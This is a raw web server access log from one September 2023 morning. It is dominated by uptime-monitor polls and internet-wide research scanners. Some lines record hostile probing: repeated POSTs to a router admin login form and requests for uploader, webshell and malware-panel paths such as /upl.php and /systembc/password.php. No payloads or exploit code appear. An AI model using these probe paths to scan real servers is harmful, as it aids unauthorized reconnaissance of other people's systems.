34.116.76.164 - - [04/Sep/2023:10:33:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.116.76.164 - - [04/Sep/2023:10:33:55 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
35.221.58.178 - - [04/Sep/2023:10:34:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.221.58.178 - - [04/Sep/2023:10:34:33 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Sep/2023:10:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:35:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.77.127.183 - - [04/Sep/2023:10:35:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
179.43.191.194 - - [04/Sep/2023:10:35:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.79.162.186 - - [04/Sep/2023:10:35:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.176.42.208 - - [04/Sep/2023:10:35:26 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
179.43.191.194 - - [04/Sep/2023:10:35:29 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.191.194 - - [04/Sep/2023:10:35:43 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:10:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.222.229.167 - - [04/Sep/2023:10:36:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.222.229.167 - - [04/Sep/2023:10:37:02 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
35.247.74.7 - - [04/Sep/2023:10:37:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.247.74.7 - - [04/Sep/2023:10:37:44 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Sep/2023:10:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:37:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.42.208 - - [04/Sep/2023:10:38:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.224.238 - - [04/Sep/2023:10:38:37 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.94.251.105 - - [04/Sep/2023:10:40:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.94.251.105 - - [04/Sep/2023:10:40:33 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
35.176.42.208 - - [04/Sep/2023:10:40:45 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.224.238 - - [04/Sep/2023:10:40:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.230.109.196 - - [04/Sep/2023:10:41:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.230.109.196 - - [04/Sep/2023:10:41:26 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
18.170.224.238 - - [04/Sep/2023:10:41:44 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
34.88.184.158 - - [04/Sep/2023:10:41:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.88.184.158 - - [04/Sep/2023:10:41:49 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Sep/2023:10:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.236.9.215 - - [04/Sep/2023:10:43:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.236.9.215 - - [04/Sep/2023:10:43:02 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Sep/2023:10:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:44:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.42.208 - - [04/Sep/2023:10:44:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.247.94.32 - - [04/Sep/2023:10:44:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.247.94.32 - - [04/Sep/2023:10:44:24 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
18.170.224.238 - - [04/Sep/2023:10:44:39 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:46:32 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:46:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.224.238 - - [04/Sep/2023:10:47:31 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:49:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.42.208 - - [04/Sep/2023:10:49:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:50:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:51:52 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
179.43.191.194 - - [04/Sep/2023:10:52:37 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:10:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:54:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:57:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.76 - - [04/Sep/2023:10:58:24 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.229.49 - - [04/Sep/2023:11:00:55 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.229.49 - - [04/Sep/2023:11:00:58 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.229.49 - - [04/Sep/2023:11:01:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
167.248.133.52 - - [04/Sep/2023:11:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.52 - - [04/Sep/2023:11:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.52 - - [04/Sep/2023:11:01:43 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.52 - - [04/Sep/2023:11:01:43 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Sep/2023:11:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:07:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.191.194 - - [04/Sep/2023:11:08:13 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:11:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.66.168.49 - - [04/Sep/2023:11:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:11:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.72 - - [04/Sep/2023:11:12:45 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Sep/2023:11:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.189.148.228 - - [04/Sep/2023:11:15:31 +0200] "GET /.travis.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:11:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.68 - - [04/Sep/2023:11:16:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2023:11:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.189.148.228 - - [04/Sep/2023:11:19:41 +0200] "GET /matomo/.travis.yml HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:11:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:11:23:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:11:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:25:04 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:11:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:26:59 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:11:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:32:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.188.18 - - [04/Sep/2023:11:34:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.188.18 - - [04/Sep/2023:11:34:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.188.18 - - [04/Sep/2023:11:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:55 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:56 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
161.35.188.18 - - [04/Sep/2023:11:34:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.188.18 - - [04/Sep/2023:11:34:56 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
161.35.188.18 - - [04/Sep/2023:11:34:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:57 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:57 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:57 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:57 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:57 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.188.18 - - [04/Sep/2023:11:34:58 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:11:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:11:35:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:11:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:11:38:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:11:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:40:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.134.16.231 - - [04/Sep/2023:11:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:11:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:47:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:11:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:11:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
